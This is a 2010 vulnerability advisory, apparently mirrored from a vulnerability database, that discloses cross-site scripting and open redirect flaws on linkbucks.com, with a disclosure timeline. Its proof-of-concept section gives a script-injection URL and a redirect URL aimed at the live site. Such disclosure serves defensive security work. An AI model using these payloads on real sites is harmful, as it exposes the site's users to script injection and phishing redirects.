`==============================================================================
Linkbucks.com XSS & URL Redirection Vulnerabilities
==============================================================================
1. OVERVIEW
A famous link-based advertising network, linkbucks.com, is currently
vulnerable to
Cross Site Scripting and URL Redirection vulnerabilities
2. SITE SERVICE DESCRIPTION
Linkbucks is the first Internet advertising network to recognize that
the interplay
between websites and web users is the foundation of a successful viral
campaign.
Linkbucks brings web users, websites, and marketers together in a way
that is beneficial to everyone.
3. VULNERABILITY DESCRIPTION
The Default.aspx page at linkbucks.com is vulnerable to Cross Site
Scripting vulnerability
as the Message and ReturnURL parameters are not properly sanitized
after a user's logging out.
4. PROOF-OF-CONCEPT/EXPLOIT
+ Cross Site Scripting (OWASP 2010 Top 10 - A2)
http://www.linkbucks.com/Default.aspx?task=completed&MetaRefresh=2&Message="><script>alert(/XSS/)</script>&ReturnURL=/Default.aspx&NoText=true
http://yehg.net/lab/pr0js/advisories/sites/linkbucks.com/xss/linkbucks.com_xss.jpg
+ Unvalidated Redirects and Forwards (OWASP 2010 Top 10 - A10)
http://www.linkbucks.com/Default.aspx?task=completed&MetaRefresh=2&Message=You%20have%20been%20logged%20out.&ReturnURL=http://www.yehg.net&NoText=true
5. IMPACT
As the linkbucks has hundreds of web users, ad publishers and advertisers,
attackers can exploit these flaws for fun and profit.
6. VENDOR
LinkBucks.com
-http://linkbucks.com
7. CREDIT
This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.
8. DISCLOSURE TIME-LINE
07-10-2010: vulnerability discovered
07-13-2010: got contact from linksbuck support team via support ticket
"#KHT-97974-227"
07-15-2010: provided vulnerabilities
08-15-2010: vulnerabilities have not been fixed
08-18-2010: vulnerability disclosed
9. REFERENCES
Original Advisory URL:
http://yehg.net/lab/pr0js/view.php/[linkbucks.com]_xss,redirect
OWASP Top 10 - http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
#yehg [08-18-2010]
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation